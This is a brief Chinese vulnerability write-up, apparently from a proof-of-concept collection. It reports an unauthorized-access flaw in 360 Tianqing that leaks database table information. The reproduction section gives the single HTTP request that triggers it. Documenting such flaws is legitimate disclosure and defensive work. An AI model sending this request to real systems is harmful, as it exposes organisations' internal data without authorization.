# 360天擎 越权访问/数据库信息泄露

## 漏洞描述

360天擎 存在未授权越权访问，造成敏感信息泄露

## 漏洞影响

```
天擎
```

## 漏洞复现

```plain
GET /api/dbstat/gettablessize HTTP/1.1
```

![image-20220209200552429](images/202202092005904.png)